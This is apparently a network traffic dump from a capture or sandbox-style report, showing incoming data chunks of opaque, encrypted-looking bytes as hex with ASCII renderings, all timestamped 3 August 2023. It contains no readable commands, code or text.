                                                                                                                  2023-08-03 15:59:56 UTC618INData Raw: ae 26 e7 4c f2 9a 11 1c b8 38 5b b1 7e e8 1f 4c d5 56 e6 00 a0 9c 15 02 1e fc b8 d8 27 a8 ae 3b 3f 34 ec 90 41 3b 9a 7b 84 00 bb 90 91 26 e0 18 c8 04 fb dc 8d 1e 01 06 f3 1e c6 bf 53 92 8e bb 4f 7b 1e c9 3f c5 45 ff b9 67 01 b7 a7 a2 72 69 21 9c 41 22 49 57 a5 01 7b 43 57 fd 42 6f 66 f4 fe fb 68 ef a2 93 3f 93 ba 57 93 09 43 38 62 ff f6 01 10 c9 6e 5a 18 99 48 4c 60 4f db 72 68 49 6c 77 1e 7e 3a 9e a3 77 4b 9a e9 b5 5f ea b0 30 37 2b d8 e0 13 79 39 61 ce f4 2d b9 8e 87 2b 08 5f 7d e6 68 04 0b a6 4b 89 0d 1e 3b ea cf d1 b8 cd fc b3 cb 34 7a 0b 14 f7 fe 7e fd 99 97 cd 94 d7 28 63 0f b0 24 9f ca c7 e8 0c f5 2d e7 e9 4c 94 59 99 ae 79 43 ee b2 1b 9a 49 2c 92 07 cc 59 6f 47 fc 3a 96 93 e9 d1 0d db a2 56 ca 02 32 45 86 23 e3 12 92 cc 12 dc 09 44 24 63 10 eb 1e
                                                                                                                  Data Ascii: &L8[~LV';?4A;{&SO{?Egri!A"IW{CWBofh?WC8bnZHL`OrhIlw~:wK_07+y9a-+_}hK;4z~(c$-LYyCI,YoG:V2E#D$c
                                                                                                                  2023-08-03 15:59:56 UTC619INData Raw: 6f ef 19 be 39 e4 1e c0 5d bb 49 11 23 88 5c 3d cf ed 30 f9 82 4b d1 cd e8 db bc e4 98 18 65 ff 71 00 b1 11 61 68 bb 23 60 0e fb 7b b4 22 ff 82 21 88 6d db ed 6f 6e 2a 13 ff 18 e9 92 c6 10 ec 8e 86 63 54 44 32 e0 a2 10 74 fd ad 32 0b 83 66 70 06 ed d4 f5 b7 b4 5f 56 75 f0 0f 16 81 ac 68 96 9b ff 89 ac 89 ba ff 4f 46 ed 9c 3c b1 a8 79 d4 9b f6 cb 46 1e bc c6 00 88 92 e4 f8 6e f8 94 54 aa 7a ac f7 bf 9a 6f 82 9a 74 c0 ef d8 5d 7f 2e f2 30 4c 11 0f 47 a4 43 99 db 3c 8b cb 28 c9 0a fb c0 52 21 eb be 66 0d af a2 09 b6 f2 74 10 01 45 cf 39 3e 1d c6 ba b7 23 cc 32 78 0c 3c 52 24 e8 29 a5 ae 18 e3 d0 ed 2e 8e a1 72 69 7b 99 34 d6 8b e0 17 54 e3 67 a7 ab 08 e6 32 e1 25 c1 07 ff 20 72 0b d1 ca 13 fd b0 67 76 78 f8 56 4e 4a 85 09 91 92 6e 16 fb fe 07 52 41 f1 6e be
                                                                                                                  Data Ascii: o9]I#\=0Keqah#`{"!mon*cTD2t2fp_VuhOF<yFnTzot].0LGC<(R!ftE9>#2x<R$).ri{4Tg2% rgvxVNJnRAn
                                                                                                                  2023-08-03 15:59:56 UTC621INData Raw: e6 21 af 5d e2 77 f7 9c 91 52 2d 81 d4 ff 32 fa dd e6 81 45 63 16 7c 06 24 47 af 9c 54 b8 8e fa 6c 88 43 c8 33 11 82 81 8a d0 fe 8c e6 85 72 64 51 c5 88 20 ed 46 15 fa 50 a9 25 b5 dd 03 60 c1 d9 e8 b2 9c a4 fe 7e fb 80 98 5f ae 5b c1 19 3e 00 57 aa 3a ac 72 1d d4 01 72 82 74 98 c1 e8 ae b1 85 66 b0 9c 33 99 91 5d 12 4f f3 34 e7 ca f4 8c 04 ad 25 ac b3 29 4c c9 c2 88 61 d8 ed b8 a7 a4 f8 72 c3 3c 5a 95 2b e9 19 ff db 7e 44 53 f7 ac 41 38 46 c7 d4 81 d3 82 7e 97 18 66 d8 81 c7 dd dc 3b d9 0f ee 8b 5d 5b 75 41 12 77 4b 4a 03 3b a5 2b ce 34 d9 d2 d8 33 5d fc c2 47 73 cf 07 ea 53 56 b5 a6 7d 6e ae 91 7d 73 1a f7 fa 4d e1 1b 85 04 d7 9b 50 1c 9a 72 7f fd 4a 31 e6 a6 16 6a eb 73 f4 bf 67 fd 36 35 a2 f1 ed 38 76 45 71 f9 17 8a 69 53 5a f8 22 6e f4 26 bd 60 50 14
                                                                                                                  Data Ascii: !]wR-2Ec|$GTlC3rdQ FP%`~_[>W:rrtf3]O4%)Lar<Z+~DSA8F~f;][uAwKJ;+43]GsSV}n}sMPrJ1jsg658vEqiSZ"n&`P
                                                                                                                  2023-08-03 15:59:56 UTC622INData Raw: 15 15 9f 45 76 4a ad 79 d3 ab 1a b3 51 04 82 d3 44 98 58 4c 52 df a5 57 73 fd 6b 45 80 7c d8 89 39 8c 6e 45 34 3d a0 56 ee d2 ae 85 84 fb b0 5a 91 aa c6 fd 68 0b e7 b3 5d 11 3c af 60 c6 2b 2a 48 c0 f9 b9 c1 17 12 c5 99 61 bb 31 5c ae 55 83 00 28 6e d9 df a6 df 9f bf 2d c2 7c 04 6e d7 b5 4f f1 39 09 63 96 74 4a 4f 09 a3 b1 24 51 c6 97 88 59 5c 0e 8f 70 ca d9 07 51 d2 0b b8 7a 0b ff 0c 94 92 c9 6e 89 99 04 86 96 2e fc e3 e1 80 45 4c ea d8 27 37 10 f7 04 68 94 28 cf 5f e4 09 4a 7b 8e 69 ad 4e 01 d7 ee 80 be a6 c1 0e 96 53 40 ae b0 76 11 48 00 4f d6 0d 58 48 d9 14 ca b9 1e 19 5a f6 15 d3 f5 eb 0d 45 df c8 d8 d4 d5 ad fd 1f 91 5a 26 27 c4 d5 9c f9 03 90 f3 a7 1c 5f 9c 99 9c 5d 14 ae c9 79 50 76 0b 13 36 9c 7f db af 7b f8 a5 9f a7 a5 df 22 36 f3 1c 30 7f b3 24
                                                                                                                  Data Ascii: EvJyQDXLRWskE|9nE4=VZh]<`+*Ha1\U(n-|nO9ctJO$QY\pQzn.EL'7h(_J{iNS@vHOXHZEZ&'_]yPv6{"60$
                                                                                                                  2023-08-03 15:59:56 UTC623INData Raw: 59 a3 a8 1c 35 62 72 ef e8 68 6d ad 83 49 86 fe 46 b0 34 7c 56 a9 82 62 a8 b5 b1 59 d8 69 16 39 38 6c 93 e5 90 f6 29 b1 cc 85 af be 46 95 66 68 ff 9f 79 ad 2c c3 71 d5 b7 24 6e 4c 50 e9 e7 db 2e 65 79 5a 4f 4c ca 40 18 67 b7 fe b7 aa 6d 6a 1a 0a 04 fd f2 60 c5 79 72 2e 9e 64 a0 be 2f 73 dd 15 39 2b 76 74 d5 0e cb cd b0 f3 7f df 34 7c 07 b4 34 3e fb 3a 0c 8a 5a 4b 69 20 6b c3 d9 96 ac 2e 4a 97 fd 9c 42 a1 c8 4a 8e 97 33 25 67 e3 f7 27 3b f0 29 f0 b6 50 53 f7 0d d0 c8 aa 9d 3c 5c 87 ff 0a 53 d2 64 2c cd ac 1f eb 5e 52 7b 37 40 b3 5b 1d b6 6c a6 ff a3 4b e7 51 06 20 a4 1a 9a 14 ff f6 79 75 ef 2c 02 15 f3 37 ad b4 47 ee 5a ed 9c cd a1 3b cc 19 7d 3f 0f 48 5b 39 bb 64 33 e4 c9 89 ca 39 5b 20 90 25 30 13 c5 31 58 45 c1 a1 9f 8f 9b df ae 14 dc 29 88 02 a7 a0 40
                                                                                                                  Data Ascii: Y5brhmIF4|VbYi98l)Ffhy,q$nLP.eyZOL@gmj`yr.d/s9+vt4|4>:ZKi k.JBJ3%g';)PS<\Sd,^R{7@[lKQ yu,7GZ;}?H[9d39[ %01XE)@
                                                                                                                  2023-08-03 15:59:56 UTC625INData Raw: 6b 9a 13 6a ce 1a 41 fd 36 59 f8 56 54 b5 c7 51 ac cb 1b 5c 94 28 90 83 ef aa d9 d3 08 1b 8e 3c 42 27 55 7e 93 68 f2 53 89 07 29 46 99 4d 89 a8 8a 96 05 8c 4c 23 de bc f7 f7 d4 87 4d 66 75 1b 42 ed 91 bf ee 46 d0 c5 4d 9e da c9 5c 67 23 4e 3e 8e c8 dd 03 e9 34 d5 40 fb 1e dd f9 00 0b 7f b3 ae 81 38 c9 ce 6b 28 8a b3 5c 03 63 eb 4e 01 a2 bd 1d a9 a6 4c ad 27 6e df 00 09 93 d6 4f d5 98 9e 95 3f 6e 27 72 d6 2b 11 d7 74 31 b9 4d bf 6d 0b aa 03 b4 7c fb e2 3c d0 93 d3 b6 4a d7 33 23 73 9a 83 90 09 b6 ad 27 ed f7 c3 17 5c 7a cb ac cc 87 c6 ea e9 eb 2b 8f 64 4f 28 ed ee 3f 86 9d 7c a6 b8 c3 e6 62 b9 aa 6e a2 84 dd 37 93 77 70 1c 1f 66 00 05 c1 19 92 25 f6 d7 3d 39 1a aa 1f 82 a9 6d 7c 1f 2f 0a d3 b8 10 e2 22 7f de ed 73 7a f8 e8 bc b4 02 ae 64 03 4f 8f 25 8b c3
                                                                                                                  Data Ascii: kjA6YVTQ\(<B'U~hS)FML#MfuBFM\g#N>4@8k(\cNL'nO?n'r+t1Mm|<J3#s'\z+dO(?|bn7wpf%=9m|/"szdO%
                                                                                                                  2023-08-03 15:59:56 UTC626INData Raw: ed 62 17 76 b3 29 63 a2 c1 e5 75 55 91 09 e1 3f 31 b3 39 53 77 12 41 39 e8 e2 16 ed 0a 99 67 d1 e1 46 44 cb c0 84 d5 91 70 79 55 0b e8 3d 27 c9 6d 93 88 44 1a c6 0e e8 81 de f1 e1 9f 0a c7 19 08 20 bb 3a 0e 25 56 64 5b 45 8d 75 0b 3e eb 94 ce 70 2d e8 89 2d 07 02 e1 fb 66 c1 12 f6 09 11 d4 1a d9 5f 89 d2 2a c5 fa 7f 53 45 bc 4e ec 79 dd b0 d5 9c ac 01 37 98 ad b2 fb ab 96 f1 c2 29 8e 9d c3 68 84 0d 1b 83 cd c0 14 28 22 d5 d6 2c 3e 21 bc d8 fe a7 10 26 55 75 e6 41 7b 54 5b 64 d1 0f 58 4c 96 da 9b bc 0d 63 f0 19 0d ed 39 20 30 e4 76 8d f2 cf 8e 74 78 3e 5e 9f ca 91 37 c2 8f 7b d5 b0 8e 9b 0c 76 c4 1e 0a 9e 32 9f 63 27 5c ec 3b fb ce 0d a5 da 35 d6 f6 88 a7 92 81 dd a0 dd 57 74 c9 28 6c 09 2b f4 a2 c8 84 c4 bd 5f 7e db dc 1c df c2 bc 27 87 2b 45 a7 7c d8 67
                                                                                                                  Data Ascii: bv)cuU?19SwA9gFDpyU='mD :%Vd[Eu>p--f_*SENy7)h(",>!&UuA{T[dXLc9 0vtx>^7{v2c'\;5Wt(l+_~'+E|g
                                                                                                                  2023-08-03 15:59:56 UTC630INData Raw: 63 e4 ca 2f 7d cd 38 67 96 df 2c 7d 28 6f b5 38 f6 00 76 6a 62 48 67 1a 9f 90 30 cc 94 5a ba 4d 07 1d 78 e9 3d 33 cb 37 fe 87 c3 90 02 e8 8e d0 96 13 15 8f 93 ac f1 38 96 fd 9c f7 04 8a 4d 3c 4d 40 e8 92 25 fd 35 ff 1f 2d c7 cc 29 3d 34 68 6a 95 de 06 a0 1f 71 d0 24 95 a0 3d 3f 29 fb 1a 6e 82 cf 0a 98 42 9b ef b0 87 0f dc 1d 84 b7 e9 30 8f 13 bb ea 13 85 62 99 84 5c ee 31 b5 be 85 27 4a 84 42 0c 29 8c bb 18 70 12 a2 49 8a 01 de 3e 49 b5 74 1e 7b f8 b4 1e e2 eb 15 03 09 c5 89 df 10 a3 96 a1 39 b7 af fe 5e 34 3f aa 67 c0 88 9f ed 8d d6 4c 11 10 14 ea 09 34 ff e2 c0 ce a0 c5 37 9c 1b 47 36 51 7e c1 3c 96 09 a5 4f 23 3c fc 54 56 79 1a 35 db 6a ad ce 18 a9 d0 8a b1 91 85 00 7d 55 57 41 fd e7 0d 57 b3 f5 90 f3 44 85 04 c6 30 d2 7d 2d 0d db 85 b4 38 10 ec d3 d9
                                                                                                                  Data Ascii: c/}8g,}(o8vjbHg0ZMx=378M<M@%5-)=4hjq$=?)nB0b\1'JB)pI>It{9^4?gL47G6Q~<O#<TVy5j}UWAWD0}-8
                                                                                                                  2023-08-03 15:59:56 UTC634INData Raw: 3d f4 68 71 30 90 21 f7 7f 08 fc d6 15 62 1b 74 cc 54 02 2d f5 9b 39 c4 0b 46 7a 15 f9 8b e5 90 6b b1 ab c0 00 9d df e4 12 04 00 f4 41 81 a5 b5 7d 5a 4b 15 db 1c 65 f2 36 91 e9 e9 5f 36 74 e1 ac c2 a3 a4 6c d8 e4 8c 6b 8b 92 25 80 1a 4c 15 4e 78 d5 da 51 91 dd b7 35 9d 7a f8 c6 ce eb f4 1b 81 6b cf c3 1f fa a1 ee 23 62 f8 7d f5 ba 4e 67 cb 64 79 d0 00 8b 2c a5 9c 75 a7 c2 5b ad cf c3 6e 26 13 6e 65 c4 98 25 54 3a 0c d4 f7 50 15 14 cb 79 19 13 e3 88 4f c6 a8 f6 f5 f3 94 b0 78 93 17 58 da f9 e9 de 46 58 12 7a 79 97 08 a9 16 b4 f2 d7 d1 a6 fb 7d 99 ed aa c5 3f 0e 2e 83 5e 8c 55 da 9a 91 b2 af 7e 98 1c 73 4d 4a 9f 54 b1 46 e4 68 66 d3 13 77 6d 88 52 d6 2b 32 6a dc d7 ed 6d 47 6d 97 a4 d8 41 4c 2d d8 fc 27 ee 32 97 3c ed 5b 1b 23 d0 b7 bd 57 34 3d b4 16 bd f6
                                                                                                                  Data Ascii: =hq0!btT-9FzkA}ZKe6_6tlk%LNxQ5zk#b}Ngdy,u[n&ne%T:PyOxXFXzy}?.^U~sMJTFhfwmR+2jmGmAL-'2<[#W4=
                                                                                                                  2023-08-03 15:59:56 UTC635INData Raw: 4f 41 75 7f 77 81 73 c0 9d b7 d3 1f a3 44 79 88 e7 cb e6 6e 9c e8 1d bc 6b c3 43 20 4a fe 03 4e 11 11 bf 3f 32 d2 cc da e8 f0 e6 f6 b5 70 5a 01 af 59 5e f4 dc c3 21 24 09 71 9d 99 d7 c3 d9 fb 26 15 38 ae ae 7a e0 bd 14 20 43 35 af d4 c7 92 bc 7a cf 2e c3 95 5e fa 07 ec bb 8f 6e 9f 0f 6a 8f a2 b8 e6 ba a2 52 99 6b c8 ac 49 1b a5 62 8d af d3 5c e6 0e 39 3e a9 7a a4 08 92 08 a1 28 ab 33 7f ce 06 d9 7d 89 97 bf 73 3d 90 6b 2a 55 ae 41 42 45 89 fc 17 c3 87 cd e0 62 da 10 9d 62 f8 53 c8 3a 32 00 93 c0 1b 83 2f cb c3 92 18 cc a1 18 62 93 79 bf 9f b9 34 41 61 56 3d 19 30 74 6f 49 be 7c 01 11 3e 9f 5c 25 00 f7 0b d4 96 6a 0f cd a4 55 91 0a 9c 6e 71 5e 49 f0 ce d0 c8 b9 d0 d0 a1 68 ab 26 81 10 9f 66 f5 bf 1b b8 ac 36 f6 bc b2 a7 70 63 e9 58 e1 4b d7 17 07 a0 39 3e
                                                                                                                  Data Ascii: OAuwsDynkC JN?2pZY^!$q&8z C5z.^njRkIb\9>z(3}s=k*UABEbbS:2/by4AaV=0toI|>\%jUnq^Ih&f6pcXK9>
                                                                                                                  2023-08-03 15:59:56 UTC639INData Raw: 95 c4 e6 98 c4 23 cf 63 4b 00 42 74 a7 fa c8 a9 59 20 b1 8a 6b 24 ef 0f 21 78 a0 6b 7b 88 3c a0 c8 4d 31 71 c8 3a 3a 62 03 d0 f0 d5 cc cf eb 8c 05 0e 86 48 e7 80 7e c4 aa 12 b9 59 c9 c3 72 81 00 77 9a ff aa ba ee 5e e7 3d 77 57 21 cd 9e 7c bf 8d 40 bf e4 be f4 f1 ad eb b8 4e 8a 46 c6 5b 33 11 33 3a 68 d0 da 06 40 7b e1 df ec 92 7c 81 72 0c 84 f3 b6 00 22 38 14 9a 89 15 cb 63 d3 ab 7e e0 58 c0 da dd e3 a7 37 c9 d7 a9 c0 46 32 9d 0d 2f 7a ef f3 f5 5c 9a 08 6d 2d 07 a0 48 b1 12 e2 c3 b5 18 b1 c0 63 9e 49 df 92 37 af b9 c7 16 2c 30 31 2d af bc 34 2b 6d bb c7 1e d6 fb 3f 55 04 4c 32 ae 4f 94 d9 5d 7f 69 20 3f 00 8c ec ed 9e 45 a9 31 9f 0e 86 19 91 e2 3a 45 74 b6 fb c2 d6 79 50 31 9b 97 78 5d c0 93 c9 85 bd d8 5a 1b 5e b9 ce 71 64 24 6b cc 09 fa 7f 75 03 89 6d
                                                                                                                  Data Ascii: #cKBtY k$!xk{<M1q::bH~Yrw^=wW!|@NF[33:h@{|r"8c~X7F2/z\m-HcI7,01-4+m?UL2O]i ?E1:EtyP1x]Z^qd$kum
                                                                                                                  2023-08-03 15:59:56 UTC644INData Raw: 21 ee 03 cc e4 bd de a1 ee b0 4a 9b ae 5a 7f aa cb 46 c1 5e f0 b1 c1 6e c9 9f b2 22 0c 7b 3c 07 be 53 18 85 f3 29 41 ca 91 2a 52 6e 4d 70 2f d5 10 48 df 53 5a 8a 4f f6 91 08 3e 18 d5 25 2e c5 5b 30 33 fa a2 6a 3d 07 98 9c e2 bd 7f dc 6c f6 a9 6d 22 42 0b 81 23 82 9e f0 0f fd 85 20 ca ee 1f f8 0b e7 0d 2f 40 b8 d9 4b 81 ee 9d ee 67 6f b4 72 1e d7 fb 24 25 0e 30 66 be f6 b2 e2 34 80 cf ee 03 c4 40 f3 ad 39 56 36 1f 2a 76 1c d5 0f e9 78 ce 38 4f 56 2b e3 a7 5e 2f f1 b3 70 98 30 00 be a7 b2 a0 14 e1 32 4a 8d f6 52 f4 ac db e9 c1 06 3a 8c a5 3e cc f9 fc be bd ed 70 9c 89 6b 24 dc 5b e0 c7 0e e9 14 71 51 c8 03 11 c6 3c e0 1c 36 ac fc d2 0f e7 ed 9e c6 96 13 bd 45 75 4f 9b fd 5a 9b 12 93 ce ba 47 84 79 31 d6 39 36 f6 ca 2b e3 56 7e db 3b a0 6b b4 44 fe 5a a0 f3
                                                                                                                  Data Ascii: !JZF^n"{<S)A*RnMp/HSZO>%.[03j=lm"B# /@Kgor$%0f4@9V6*vx8OV+^/p02JR:>pk$[qQ<6EuOZGy196+V~;kDZ
                                                                                                                  2023-08-03 15:59:56 UTC648INData Raw: 82 13 83 b6 8e aa 4a f5 d0 7e 03 83 98 25 28 78 dd 80 bc a2 b6 2f 6d 41 c9 8f d7 70 10 a0 53 66 cc 65 37 41 2c c5 f6 3f 6b 36 38 f5 ee 60 57 59 1b 4c 75 de f8 b6 4e 69 9e e0 03 d6 ca 5c 83 8b 23 69 7e 8b e7 ac da 2a 61 07 09 b7 a3 d0 4c d6 49 72 25 ab f4 2a 88 3b 96 93 40 bc 59 b6 29 af 4b 16 18 5a 0e 37 e1 4f 9f dc da 04 33 16 3b 06 66 e0 a2 b6 b8 cb e2 35 ce 76 7a fa e3 33 15 f5 db 76 94 12 78 37 39 45 b3 4a 38 48 d5 f1 6e 8e 75 c0 b9 92 9b 76 45 82 b4 68 83 5c 11 13 3b 8a 84 d1 65 b3 da dd 37 5d 6e 81 a5 05 be 01 da e2 06 33 4d 18 ac bb 1f 65 d2 36 04 79 0f bc f4 c6 0c 01 a8 43 d5 58 3c b7 5f 3a 46 c1 73 fa c1 a0 a6 48 c3 d0 dc a2 6f d0 4c e2 05 8f e3 41 a9 03 9d e4 60 7f 23 41 7d d5 5a 81 d9 ca b9 f3 bc f0 f4 3b ad 8e 41 c9 9d 9e 3e 41 9e 72 f9 cc 7d
                                                                                                                  Data Ascii: J~%(x/mApSfe7A,?k68`WYLuNi\#i~*aLIr%*;@Y)KZ7O3;f5vz3vx79EJ8HnuvEh\;e7]n3Me6yCX<_:FsHoLA`#A}Z;A>Ar}
                                                                                                                  2023-08-03 15:59:56 UTC652INData Raw: 50 a0 c7 80 2e e0 fe 5c d8 71 38 e6 79 1a db e7 f7 98 37 f0 1a 0b 00 87 c3 68 e3 37 f6 4b fe 16 5f 91 3d 00 2e c6 c7 f7 2b 42 31 a2 53 3a 95 5e e0 c8 23 80 db 55 a6 b6 fa 21 d0 96 4d 3b f2 a6 4b 84 e9 c9 1a 17 f4 85 6c 19 ca f5 7d 9f cc c1 2e b9 9f 7c 72 3d 2b f3 04 77 d0 fd 7d fc e1 db ac 7c dc 63 9f 7e 04 06 3a ad 06 66 fb 8a d3 3e 8a 13 db f9 33 8c 37 6d f1 e4 60 fd f9 98 3b ea fa 82 df eb b8 ab 8d fc 68 6e 44 58 82 ba a9 dd 85 64 64 c9 d8 1d 9b 88 d4 9c 67 5b 1d bc cc f9 c9 28 bb 30 94 1b a1 cb d4 e6 5c 48 fe 12 61 9b b0 d6 43 0d ea 84 03 e5 55 1b 49 d1 86 00 cd 2c 00 de db d9 15 d0 37 af c1 12 d5 5a 4d c9 36 4c 07 cf d4 5d c0 03 24 e1 4f 9c f4 0e f7 16 65 25 78 b4 3b 9e 79 40 76 66 73 32 88 2b 7d 5e 75 1e 3e e0 9c 33 b6 cc fe a0 a5 5c 61 44 45 06 ac
                                                                                                                  Data Ascii: P.\q8y7h7K_=.+B1S:^#U!M;Kl}.|r=+w}|c~:f>37m`;hnDXddg[(0\HaCUI,7ZM6L]$Oe%x;y@vfs2+}^u>3\aDE
                                                                                                                  2023-08-03 15:59:56 UTC656INData Raw: f6 a0 b1 e4 20 d6 b3 e0 ab ae d8 bc d3 76 f1 a4 cd dd 80 d8 26 de fd 00 32 c1 55 8c 51 2f 8f ee 96 3e 87 ae 05 1f db 6f a4 57 39 7f 0f d9 1c 94 e9 f8 68 3a 41 97 c4 d2 ea a0 1f d0 56 3f 8e 44 e1 43 d7 6e db 4b 66 fc d8 02 df ac 07 d4 1f da 28 51 55 32 ac 3d 0e da 66 4b 88 2b 04 7c ad 58 0f 89 ed 23 45 70 57 ef 88 ae 7a 79 9d b9 6f 21 9a e4 c0 a2 6b 42 dc 17 b5 ed 73 4c f8 09 5b e7 a3 0d 2f 1f 7a 2e 40 24 a2 39 99 93 ec 59 ef 4d a6 21 69 81 95 a0 dd 63 6b bd a1 29 1c df db c2 0f 86 bf 03 5f 7d 22 6d 91 62 f2 77 7e d5 03 44 62 c2 64 03 2b 13 d5 a8 c8 8d 62 ab f0 64 c9 ed 05 57 9e 71 a3 6b 19 c3 9e ee f4 bc f2 a7 bc 12 60 43 29 6b c9 d3 b8 2a af 98 76 26 c5 bc fa 1f 2c e4 9a 51 a3 7a e0 ba 17 34 42 84 96 71 d9 86 03 f0 55 22 34 ad 68 d8 d1 c5 81 ae 0b 5b 49
                                                                                                                  Data Ascii: v&2UQ/>oW9h:AV?DCnKf(QU2=fK+|X#EpWzyo!kBsL[/z.@$9YM!ick)_}"mbw~Dbd+bdWqk`C)k*v&,Qz4BqU"4h[I
                                                                                                                  2023-08-03 15:59:56 UTC660INData Raw: 7c 8f d7 10 03 00 f0 eb cb 04 32 b3 d5 ce 3b d6 b2 80 1e 13 b3 15 b5 cb 95 0b 5c 18 1a a0 77 ca 0d 7a bb 92 aa 75 ae 49 0a 1b ea e0 ce 8c 26 c3 a5 ea 59 d9 62 ea 35 7d 91 a1 6c 06 1b 1a b5 b6 53 3f c2 dd 65 47 f6 5a a2 a0 b6 f4 99 2e df 53 9d 29 e8 f9 21 1e c3 66 d0 c1 11 b8 d0 fd e8 f4 ec f5 bf 1b 55 7a 8a fe 11 f3 e1 67 7e f6 ba e2 2b 1b 23 94 f7 1d ad 11 aa 34 82 32 6d 6f 6d d6 a7 2b 0d af d0 d4 dc bc 91 c9 af 1b 0d ba 53 be 96 0e ba 7f a7 40 b0 f0 f9 4e 39 90 a7 98 75 fa 9e 36 b9 dc 3b dc bd e8 a4 1c 7b 9f 89 d2 c6 79 d1 4f fa 7f 23 33 57 11 f5 d8 62 ba de f3 8f c2 d7 60 18 f9 cf fe 09 c4 10 64 74 3f 90 93 06 0d ea 59 7b d0 05 57 5d 05 0d e2 79 e1 9e df b9 83 00 64 11 85 61 ce 10 f5 85 2d 9f a4 5c d0 0c 3f c1 a2 17 c9 38 82 f5 95 ea 5e 61 90 47 a2 e1
                                                                                                                  Data Ascii: |2;\wzuI&Yb5}lS?eGZ.S)!fUzg~+#42mom+S@N9u6;{yO#3Wb`dt?Y{W]yda-\?8^aG
                                                                                                                  2023-08-03 15:59:56 UTC664INData Raw: 41 08 44 5d 78 8e 5f dc 0d 23 f6 5c ae 94 b6 8a 05 56 c0 0d 49 a8 28 3f 5f c3 88 c8 23 4b 7f ed e8 48 ce e2 bd 3c be cc ec e9 20 88 61 3f c1 7d 93 40 bd 9c e7 aa 56 42 da b5 67 a6 b3 26 a1 d3 01 5b b9 2d 32 14 61 dd 5d 54 02 8b 36 d5 be 3c 51 e8 af 28 83 ee b9 22 68 1b 47 35 36 73 a7 fc 26 be b9 b9 6c 16 a1 89 0c a9 f8 3b ad b7 e8 5b c5 ce 75 8d 99 47 5d 4c a4 f9 3c 8a a8 9d d9 24 36 8e 8d 3e 57 1e 38 93 48 c4 c8 54 30 e2 52 f3 9b b4 32 e6 0f e8 95 6a 70 fb 2e c8 c6 8a 7d 8e 82 27 6a ad 53 b3 96 0b 00 b1 bf 2e 94 d1 5f 5a e7 89 51 00 00 5d fd 82 9a 1c 49 15 1c c5 c6 3f aa 2b 15 03 a9 c6 7a 4c e7 c6 c6 08 7f 14 9e a6 b4 16 9d 3b 27 68 cd 4d 1a a3 c9 86 a8 1c f8 04 60 6f de 50 e7 40 e1 ec 06 1a fa 8f 13 c3 97 10 b5 4c ca e9 9d d2 a0 c4 05 fc d9 c8 dc 76 07
                                                                                                                  Data Ascii: AD]x_#\VI(?_#KH< a?}@VBg&[-2a]T6<Q("hG56s&l;[uG]L<$6>W8HT0R2jp.}'jS._ZQ]I?+zL;'hM`oP@Lv
                                                                                                                  2023-08-03 15:59:56 UTC667INData Raw: ab f3 d2 8b 13 20 d4 3c 47 aa 90 62 c7 9b 16 36 64 1d 5e 6f 4c b8 7c 95 27 5c af d3 ce c2 8b 5c af 03 02 95 9a d2 67 cd b1 e2 65 c0 f4 d0 cd 93 e7 79 20 5a 67 5a 13 97 31 75 64 53 11 77 40 31 9d 35 c2 cd 15 1a d5 b7 4a f7 83 fc 67 50 c9 43 88 74 d8 35 9f 30 6c 2e 04 b3 89 fd 13 3e 59 03 d2 60 ae d0 29 75 a4 d5 63 15 94 62 8d ef 63 c7 21 23 14 50 f0 ad aa cf 58 3f cd f7 ee 74 d0 d8 65 1d ac e8 06 ec 6f 1f 25 b5 25 3e d5 ec 7f 6a 56 0d f0 32 8b d8 12 7c 41 17 74 aa 8a 04 7e bd 1c 8e 20 69 81 57 15 42 76 c4 29 27 c8 65 23 29 86 73 ee 75 43 d4 a6 9d 11 cc 5f 07 fc d1 2f fa ee 24 95 86 07 05 0d 57 9e aa 2e 15 6e 08 da 4e 3e c5 91 a5 d0 f3 fd af a3 17 83 8f 3f 42 9d c4 2b cd 8b a6 48 20 96 d5 03 eb 05 c2 c2 38 0b 98 d8 0a 8f 37 04 f7 46 f2 d3 e2 f0 b0 c3 55 c3
                                                                                                                  Data Ascii: <Gb6d^oL|'\\gey ZgZ1udSw@15JgPCt50l.>Y`)ucbc!#PX?teo%%>jV2|At~ iWBv)'e#)suC_/$W.nN>?B+H 87FU
                                                                                                                  2023-08-03 15:59:56 UTC671INData Raw: 52 42 78 c7 0d ed 66 89 5f 17 a2 1b 6a 79 af 2b ff 3a a9 8f 0c be ff 72 ac 14 fa f9 c3 67 fd 24 61 7c 7e 60 aa 16 31 09 4d bd bb bd 68 79 1d 2a 23 c1 76 4f 5a 4b 6c 91 46 a6 42 ee 6b a3 f3 24 6a 02 4d 67 ce 96 c5 4e 11 57 ca 4c cd 0c 6f e5 b9 d8 a0 25 c2 b9 d2 e0 46 e2 cc bd 09 f9 1e 56 10 c0 76 b4 30 81 cd fa 35 60 5b 22 88 f0 a5 94 a1 85 18 7a e8 e6 cb 7e 7f a3 30 ff 87 00 7a 76 7d c0 67 cc c8 58 dd 24 75 a4 e8 cd ff b9 8e 58 03 0d 9f 24 bb d8 cc b1 f2 12 0d 9f 7d 83 7c 47 a7 92 ee 3a 0e 74 6e b1 6c 43 97 22 d8 7e 5c 51 57 82 7b be 16 46 52 1c a3 62 44 74 fd 1e 09 1c 1e 6d 3b 2f 9f ef a3 8c a4 7a 75 09 40 cd 58 be 5d 9b e0 0c a8 c7 0f 3e 20 ce a5 3b 80 aa 62 b7 97 1c fd 4f d1 e0 aa 92 26 2c 34 c7 29 f8 07 c8 6a 76 95 b1 61 b4 a1 be 92 c6 6a c9 dc 91 ac
                                                                                                                  Data Ascii: RBxf_jy+:rg$a|~`1Mhy*#vOZKlFBk$jMgNWLo%FVv05`["z~0zv}gX$uX$}|G:tnlC"~\QW{FRbDtm;/zu@X]> ;bO&,4)jvaj
                                                                                                                  2023-08-03 15:59:56 UTC676INData Raw: 43 02 1d 52 cf 26 7b 29 04 ed ee 09 64 9a 7c bf 9c 2f 44 1e 98 2c 6b 34 39 05 9b f7 11 7c 3b d7 a1 2b 0e b6 ed 7a 05 29 05 fb 0f a7 e9 06 f8 64 46 91 d5 dd 88 b5 c2 6c 02 78 ba b4 f8 d5 1d a1 0b 9e bb f8 05 03 53 cd f0 15 bd 3a ad c5 03 ca cb 17 f3 d5 f1 85 01 d1 0c 8a da 52 35 01 3e a8 0c 9f 68 4e e4 b4 02 58 d9 75 e8 80 b3 27 a5 c6 8b f5 95 55 16 1e c2 9d d6 36 85 3d 1e 04 ab 83 68 3a 11 78 09 38 fd ee b7 c1 9b b6 8f 41 7c ec 80 d7 66 db 29 27 0e 00 1d 6c f7 0a c6 f0 50 e6 a6 98 b9 23 49 85 2e f1 a6 f5 54 24 50 17 17 4c ee cb 40 fb 14 59 24 80 09 98 22 1b dd 19 f3 72 18 3d 27 99 3b ad 36 